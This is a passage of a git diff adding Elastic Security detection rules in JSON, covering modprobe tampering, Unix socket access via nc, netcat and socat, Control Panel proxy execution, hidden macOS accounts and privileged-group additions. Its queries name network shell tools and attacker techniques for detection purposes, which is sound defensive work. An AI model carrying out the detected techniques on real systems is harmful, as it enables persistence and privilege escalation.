\"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\winsxs\\\\*\\\\TiWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\drvinst.exe\",\n \"?:\\\\Windows\\\\System32\\\\services.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\System32\\\\regsvr32.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "403ef0d3-8259-40c9-a5b6-d48354712e49", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "403ef0d3-8259-40c9-a5b6-d48354712e49_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_106.json b/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_106.json new file mode 100644 index 00000000000..24737ee9d1c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_106.json @@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Detects file events involving kernel modules in modprobe configuration files, which may indicate unauthorized access or manipulation of critical kernel modules. Attackers may tamper with the modprobe files to load malicious or unauthorized kernel modules, potentially bypassing security measures, escalating privileges, or hiding their activities within the system.", + "from": "now-119m", + "history_window_start": "now-7d", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "Suspicious Modprobe File Event", + "new_terms_fields": [ + "host.id", + "process.executable", + "file.path" + ], + "query": "host.os.type:linux and event.category:file and event.action:\"opened-file\" and\nfile.path : (\"/etc/modprobe.conf\" or \"/etc/modprobe.d\" or /etc/modprobe.d/*) and \nnot process.name:(cp or dpkg or dockerd or lynis or mkinitramfs or snapd)\n", + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "40ddbcc8-6561-44d9-afc8-eefdbfe0cccd", + "setup": "\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /etc/modprobe.conf -p wa -k modprobe\n-w /etc/modprobe.d -p wa -k modprobe\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", + "severity": "low", + "tags": [ + "Data Source: Auditd Manager", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 106 + }, + "id": "40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_107.json b/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_107.json new file mode 100644 index 00000000000..a93133b9fa9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_107.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Detects file events involving kernel modules in modprobe configuration files, which may indicate unauthorized access or manipulation of critical kernel modules. Attackers may tamper with the modprobe files to load malicious or unauthorized kernel modules, potentially bypassing security measures, escalating privileges, or hiding their activities within the system.", + "from": "now-119m", + "history_window_start": "now-14d", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "Suspicious Modprobe File Event", + "new_terms_fields": [ + "host.id", + "process.executable" + ], + "query": "host.os.type:linux and event.category:file and event.action:\"opened-file\" and\nfile.path : (\"/etc/modprobe.conf\" or \"/etc/modprobe.d\" or /etc/modprobe.d/*) and not process.name:(\n cp or dpkg or dockerd or lynis or mkinitramfs or snapd or systemd-udevd or grep or borg or auditbeat or lspci or\n aide or modprobe or python*\n)\n", + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "40ddbcc8-6561-44d9-afc8-eefdbfe0cccd", + "setup": "## Setup\n\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /etc/modprobe.conf -p wa -k modprobe\n-w /etc/modprobe.d -p wa -k modprobe\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", + "severity": "low", + "tags": [ + "Data Source: Auditd Manager", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 107 + }, + "id": "40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/41284ba3-ed1a-4598-bfba-a97f75d9aba2_2.json b/packages/security_detection_engine/kibana/security_rule/41284ba3-ed1a-4598-bfba-a97f75d9aba2_2.json new file mode 100644 index 00000000000..07df7600a36 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/41284ba3-ed1a-4598-bfba-a97f75d9aba2_2.json @@ -0,0 +1,92 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "This rule monitors for inter-process communication via Unix sockets. Adversaries may attempt to communicate with local Unix sockets to enumerate application details, find vulnerabilities/configuration mistakes and potentially escalate privileges or set up malicious communication channels via Unix sockets for inter-process communication to attempt to evade detection.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unix Socket Connection", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and (\n (process.name in (\"nc\", \"ncat\", \"netcat\", \"nc.openbsd\") and \n process.args == \"-U\" and process.args : (\"/usr/local/*\", \"/run/*\", \"/var/run/*\")) or\n (process.name == \"socat\" and \n process.args == \"-\" and process.args : (\"UNIX-CLIENT:/usr/local/*\", \"UNIX-CLIENT:/run/*\", \"UNIX-CLIENT:/var/run/*\"))\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "41284ba3-ed1a-4598-bfba-a97f75d9aba2", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Rule Type: BBR", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1559", + "name": "Inter-Process Communication", + "reference": "https://attack.mitre.org/techniques/T1559/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "41284ba3-ed1a-4598-bfba-a97f75d9aba2_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_110.json b/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_110.json new file mode 100644 index 00000000000..105c0f9f3c9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_110.json @@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies unusual instances of Control Panel with suspicious keywords or paths in the process command line value. Adversaries may abuse control.exe to proxy execution of malicious code.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Control Panel Process with Unusual Arguments", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.executable : (\"?:\\\\Windows\\\\SysWOW64\\\\control.exe\", \"?:\\\\Windows\\\\System32\\\\control.exe\") and\n process.command_line :\n (\"*.jpg*\",\n \"*.png*\",\n \"*.gif*\",\n \"*.bmp*\",\n \"*.jpeg*\",\n \"*.TIFF*\",\n \"*.inf*\",\n \"*.cpl:*/*\",\n \"*../../..*\",\n \"*/AppData/Local/*\",\n \"*:\\\\Users\\\\Public\\\\*\",\n \"*\\\\AppData\\\\Local\\\\*\")\n", + "references": [ + "https://www.joesandbox.com/analysis/476188/1/html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "416697ae-e468-4093-a93d-59661fa619ec", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.002", + "name": "Control Panel", + "reference": "https://attack.mitre.org/techniques/T1218/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "416697ae-e468-4093-a93d-59661fa619ec_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_111.json b/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_111.json new file mode 100644 index 00000000000..70825bf7810 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_111.json @@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies unusual instances of Control Panel with suspicious keywords or paths in the process command line value. Adversaries may abuse control.exe to proxy execution of malicious code.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Control Panel Process with Unusual Arguments", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.executable : (\"?:\\\\Windows\\\\SysWOW64\\\\control.exe\", \"?:\\\\Windows\\\\System32\\\\control.exe\") and\n process.command_line :\n (\"*.jpg*\",\n \"*.png*\",\n \"*.gif*\",\n \"*.bmp*\",\n \"*.jpeg*\",\n \"*.TIFF*\",\n \"*.inf*\",\n \"*.cpl:*/*\",\n \"*../../..*\",\n \"*/AppData/Local/*\",\n \"*:\\\\Users\\\\Public\\\\*\",\n \"*\\\\AppData\\\\Local\\\\*\")\n", + "references": [ + "https://www.joesandbox.com/analysis/476188/1/html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "416697ae-e468-4093-a93d-59661fa619ec", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.002", + "name": "Control Panel", + "reference": "https://attack.mitre.org/techniques/T1218/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "416697ae-e468-4093-a93d-59661fa619ec_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/41b638a1-8ab6-4f8e-86d9-466317ef2db5_106.json b/packages/security_detection_engine/kibana/security_rule/41b638a1-8ab6-4f8e-86d9-466317ef2db5_106.json new file mode 100644 index 00000000000..714d671c8ef --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/41b638a1-8ab6-4f8e-86d9-466317ef2db5_106.json @@ -0,0 +1,92 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to create a local account that will be hidden from the macOS logon window. This may indicate an attempt to evade user attention while maintaining persistence using a separate local account.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Hidden Local User Account Creation", + "query": "event.category:process and host.os.type:macos and event.type:(start or process_started) and\n process.name:dscl and process.args:(IsHidden and create and (true or 1 or yes))\n", + "references": [ + "https://support.apple.com/en-us/HT203998" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "41b638a1-8ab6-4f8e-86d9-466317ef2db5", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.003", + "name": "Local Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "41b638a1-8ab6-4f8e-86d9-466317ef2db5_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/42eeee3d-947f-46d3-a14d-7036b962c266_9.json b/packages/security_detection_engine/kibana/security_rule/42eeee3d-947f-46d3-a14d-7036b962c266_9.json new file mode 100644 index 00000000000..c057e970864 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/42eeee3d-947f-46d3-a14d-7036b962c266_9.json @@ -0,0 +1,121 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies process creation with alternate credentials. Adversaries may create a new process with a different token to escalate privileges and bypass access controls.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Process Creation via Secondary Logon", + "query": "sequence by winlog.computer_name with maxspan=1m\n\n[authentication where event.action:\"logged-in\" and\n event.outcome == \"success\" and user.id : (\"S-1-5-21-*\", \"S-1-12-1-*\") and\n\n /* seclogon service */\n process.name == \"svchost.exe\" and\n winlog.event_data.LogonProcessName : \"seclogo*\" and source.ip == \"::1\" ] by winlog.event_data.TargetLogonId\n\n[process where event.type == \"start\"] by winlog.event_data.TargetLogonId\n", + "references": [ + "https://attack.mitre.org/techniques/T1134/002/" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.computer_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.LogonProcessName", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetLogonId", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "42eeee3d-947f-46d3-a14d-7036b962c266", + "setup": "## Setup\n\nAudit events 4624 and 4688 are needed to trigger this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1134", + "name": "Access Token Manipulation", + "reference": "https://attack.mitre.org/techniques/T1134/", + "subtechnique": [ + { + "id": "T1134.002", + "name": "Create Process with Token", + "reference": "https://attack.mitre.org/techniques/T1134/002/" + }, + { + "id": "T1134.003", + "name": "Make and Impersonate Token", + "reference": "https://attack.mitre.org/techniques/T1134/003/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 9 + }, + "id": "42eeee3d-947f-46d3-a14d-7036b962c266_9", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_6.json b/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_6.json new file mode 100644 index 00000000000..c2c07eb608b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/43d6ec12-2b1c-47b5-8f35-e9de65551d3b_6.json @@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to add a user to a privileged group. Attackers may add users to a privileged group in order to establish persistence on a system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Linux User Added to Privileged Group", + "note": "## Triage and analysis\n\n### Investigating Linux User User Added to Privileged Group\n\nThe `usermod`, `adduser`, and `gpasswd` commands can be used to assign user accounts to new groups in Linux-based operating systems.\n\nAttackers may add users to a privileged group in order to escalate privileges or establish persistence on a system or domain.\n\nThis rule identifies the usages of `usermod`, `adduser` and `gpasswd` to assign user accounts to a privileged group.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate whether the user was succesfully added to the privileged group.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Retrieve information about the privileged group to which the user was added.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Adding accounts to a group is a common administrative task, so there is a high chance of the activity being legitimate. Before investigating further, verify that this activity is not benign.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the account that seems to be involved in malicious activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and process.args in (\n \"root\", \"admin\", \"wheel\", \"staff\", \"sudo\",\"disk\", \"video\", \"shadow\", \"lxc\", \"lxd\"\n) and\n(\n process.name in (\"usermod\", \"adduser\") or\n process.name == \"gpasswd\" and \n process.args in (\"-a\", \"--add\", \"-M\", \"--members\") \n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + 